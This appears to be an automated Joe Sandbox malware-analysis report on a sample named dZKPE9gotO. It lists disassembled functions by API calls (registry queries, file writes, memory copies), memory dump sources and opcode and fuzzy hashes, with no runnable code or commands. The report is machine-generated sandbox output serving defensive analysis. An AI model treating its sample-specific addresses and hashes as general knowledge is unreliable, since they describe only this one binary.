                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99D05E727402207FC2306769BC0DF17773CEBD5B22FD40535FA05D2160CAB0580587A8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 009CFC23
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC34
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 009CFC78
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                  • Opcode ID: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
                                                                                                                                                                                                                                                  • Instruction ID: eb0cd6c430f3fad4ec8975645b58de93c01b9249da20b3e08c299df14bdd701f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2219CB1F4461ABBD620CA21C994F63BB6DFF54354B04452AEC4987A01E731F824CBE2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009C3E87
                                                                                                                                                                                                                                                    • Part of subcall function 009C3F25: GetProcessHeap.KERNEL32(?,?,?,?,?,009C3E9E), ref: 009C3F3A
                                                                                                                                                                                                                                                    • Part of subcall function 009C3F25: RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?,?,?,?,?,?,009C3E9E), ref: 009C3F61
                                                                                                                                                                                                                                                    • Part of subcall function 009C3F25: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,009C3E9E), ref: 009C3FE4
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 009C3EBA
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 009C3ED8
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009C3EE1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcess$QueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 655526730-0
                                                                                                                                                                                                                                                  • Opcode ID: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
                                                                                                                                                                                                                                                  • Instruction ID: e0ec5c66a4119043facc6642acad2286bed9a8aa2b76f86365f704eef1a70b57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05019E74904250AFE7109F60FC0BB6A3BAAEB43B05F44A42DFA459B1A1DBB148549B92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009B16DC
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020119), ref: 009B16FA
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 009B1714
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009B171D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3302636555-0
                                                                                                                                                                                                                                                  • Opcode ID: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction ID: e6aebe230c5d39b12d0207d97a183d02bd7ba18af64bc9f16786acd6bfcceccc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee248f4dd53c38405bf247ca8ee5238ced5863a67be360a17d9aa5f3422ff77d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F03776208258BFD310AB66EC4AE5BBFADEFCAB55F001429F98492110DA319814DBB1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009C4272
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 009C4299
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 009C42B5
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009C42BE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcessQueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3302636555-0
                                                                                                                                                                                                                                                  • Opcode ID: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
                                                                                                                                                                                                                                                  • Instruction ID: 47999fb9c2ef24e700a6667ccff0e39dde9a7a1dc5ef258325b7a2bfc6137641
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 452cdb83861d160aaeab07dcfee94487d58c1dcd5cff8eef09409231a212c46b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF03A35604150BBD7106B66FD0EE5BBFAEEBC6B11F401028F94596160DA714814DBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00414951
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: SystemTimelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                                                                                                                                                                                                                                  • API String ID: 3844799746-2529986050
                                                                                                                                                                                                                                                  • Opcode ID: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
                                                                                                                                                                                                                                                  • Instruction ID: c736f10abd315c62769dbfe5a1a641e1cbd682ca060b05bc7c7f52c3ab47b370
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 750d2aa208a34747d7678eb531c57cdd49b6176f000d565d5a4f2305a08da36e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E2126747142945BCB18AB36981637B7A93EBC2319F05507EF4C6873D1CE398C51C799
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00420E27
                                                                                                                                                                                                                                                    • Part of subcall function 00420E92: std::exception::exception.LIBCONCRT ref: 00420E9F
                                                                                                                                                                                                                                                    • Part of subcall function 00420F5E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00420E1A,?,0042FAAC,?), ref: 00420FBE
                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00420E44
                                                                                                                                                                                                                                                    • Part of subcall function 00420D34: ___std_exception_copy.LIBVCRUNTIME ref: 00420D52
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::exception::exception$ExceptionRaise___std_exception_copystd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: mB
                                                                                                                                                                                                                                                  • API String ID: 2169675119-2452807568
                                                                                                                                                                                                                                                  • Opcode ID: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
                                                                                                                                                                                                                                                  • Instruction ID: e72b37502660f04861b35797f6b59bd50dabb48465353804d4c1080e981a2c3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 762417f7dd4c8e10dfcb5cd59a9516837bbceaeff1db5b106ba1449143d0051d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE0E67560022C778B14BAD6F845CCABBAC9A10750BC0843ABA4856142D7B9E555C7DC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,0040A4F7), ref: 00412CDF
                                                                                                                                                                                                                                                    • Part of subcall function 004125E0: ??2@YAPAXI@Z.MSVCRT(?,00412594,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 004125F8
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,0040A4F7), ref: 00412C79
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,0040A4F7), ref: 00412C8A
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,0040A4F7), ref: 00412CA4
                                                                                                                                                                                                                                                    • Part of subcall function 004122F4: ??3@YAXPAX@Z.MSVCRT(?,004125C6,?,?,?,?,?,?,?,00643EC0,004124C3,?,004098D5,?,00000000,004035A3), ref: 0041231C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$??2@??3@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1832667548-0
                                                                                                                                                                                                                                                  • Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction ID: 9b3e77e2d5c6555fac4121ee25edb4a6bace10c9852293726eadeddcd5a41003
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD414A727042509FC315DF29DA8486FBBE6AFD9700719896EE4C9C7304EA74AC45CB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C,?,?,00643A38), ref: 009C2F46
                                                                                                                                                                                                                                                    • Part of subcall function 009C2847: ??2@YAPAXI@Z.MSVCRT(?,009C27FB,009C25B7,?,009C25B6,?,?,00643EC0,009C272A,?,009C25FB,009C25B6,00000000,?,?,?), ref: 009C285F
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C,?,?,00643A38), ref: 009C2EE0
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C,?,?,00643A38), ref: 009C2EF1
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,009BA75E,00000000,000000FF,00643A04,?,009BAB9C), ref: 009C2F0B
                                                                                                                                                                                                                                                    • Part of subcall function 009C255B: ??3@YAXPAX@Z.MSVCRT(?,009C282D,?,00000010,009C25B7,?,009C25B6,?,?,00643EC0,009C272A,?,009C25FB,009C25B6,00000000,?), ref: 009C2583
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$??2@??3@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1832667548-0
                                                                                                                                                                                                                                                  • Opcode ID: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction ID: 36881a21a2b4fff064ae98c0b49d33baf23705cdda3b67507bee4570617f0287
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50fd1fc9e026dd08cb523296630d42d3148062dc17efa17a5c5f43f31823b528
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6241F772A042559FC325DF28C994E6EBBEAEFD9700B19896DE4C9C7304DA31AC05C792